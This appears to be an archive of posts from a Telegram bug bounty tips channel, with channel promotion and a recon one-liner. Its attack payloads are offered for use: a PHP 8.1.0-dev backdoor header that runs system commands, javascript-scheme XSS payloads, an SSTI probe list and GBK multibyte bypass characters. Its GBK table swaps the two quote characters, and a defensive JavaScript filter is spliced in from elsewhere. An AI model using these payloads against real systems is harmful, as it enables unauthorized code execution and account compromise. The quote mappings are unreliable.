Bug bounty Tips



🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist
Admin: @laazy_hack3r

5 860 subscribers
Posts archive

From 0 to 726 views per week. Starting is the best and most beautiful thing you can do, and thanks to you guys too.

You guys can join and explain to me here: https://t.me/bug_hunting_talks. We can talk; I need your suggestions. It's a humble request.

Guys, I want your response. I'm planning to start bug bounty live training classes: 2 months of training and 2 months of internship for 20k. Is it going to work or not?


If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli

Bug Bounty Tip
When the app only accepts URLs with a specific scheme, try injecting javascript://test.com
Then, use these symbols to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9
✅ javascript://test.com%0aalert(1)
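
The defensive side of the URL-scheme tip above, as an added example that is not part of the original post: a filter that only checks for a "scheme://host" shape accepts the quoted payload, while parsing the value and allowlisting the protocol rejects it. The names naiveIsAllowed, safeHref, audit and SAMPLES are hypothetical, and the sample inputs are constructed from the payload shape in the post.

```javascript
// Added example. naiveIsAllowed, safeHref, audit and SAMPLES are hypothetical
// names; the sample inputs are constructed from the payload shape in the post.

// Weak filter: accepts anything shaped like "scheme://host".
function naiveIsAllowed(input) {
  return /^[a-z][a-z0-9+.-]*:\/\/[\w.-]+/i.test(input);
}

// Hardened filter: parse with the URL Standard parser that browsers use
// and allow only an explicit set of protocols.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

function safeHref(input) {
  if (typeof input !== "string") return null;
  let url;
  try {
    url = new URL(input); // throws on relative or malformed input
  } catch {
    return null;
  }
  // The parser strips tabs/newlines and lowercases the scheme, so
  // "JaVaScRiPt:" and "java\nscript:" both surface as "javascript:".
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  return url.href; // render the normalized form, never the raw input
}

const SAMPLES = [
  "https://test.com/page",
  "javascript://test.com%0aalert(1)",
  "javascript://test.com%E2%80%A8alert(1)",
  "JaVaScRiPt://test.com%0dalert(1)",
  "java\nscript://test.com%0aalert(1)",
];

// Run both filters over the samples and report each verdict.
function audit(samples) {
  return samples.map((s) => ({
    input: s,
    naive: naiveIsAllowed(s),
    hardened: safeHref(s) !== null,
  }));
}

console.table(audit(SAMPLES));
```

Only the https sample passes the hardened filter; the shape-based check passes four of the five.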

Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
🔹{7*7}
🔹*{7*7}
🔹{{7*7}}
🔹[[7*7]]
🔹${7*7}
🔹@(7*7)
🔹
🔹<%= 7*7 %>
🔹${= 7*7}
🔹{{= 7*7}}
🔹${{7*7}}
🔹#{7*7}
🔹[=7*7]
If evaluated as 49 - the target is vulnerable
Cheers!

"🤖 Scan this QR code if you want to know what's cookin' at CipherOps! 🍳🕵️‍♂️ Unravel the mysteries of cyberworld at cipherops.tech. It's like a secret menu for techies! 🌐🔓 #CipherOps #TechMystery #QRAdventure"

Do you think web developers should prioritize security against XSS vulnerabilities in their projects?
Anonymous voting

Bug Bounty Tip
GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")
For XSS, CRLF, WAF bypass

I am looking for contributors; anyone interested can contribute on GitHub [https://github.com/Adwaithsheety/Cipherops]


To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command:

haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson

Here's what this one-liner does step by step:

haktrails -d example.com: Uses haktrails to discover subdomains of example.com.
httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com.
getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command.
anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt.
tojson: Converts the list of JavaScript URLs into JSON format.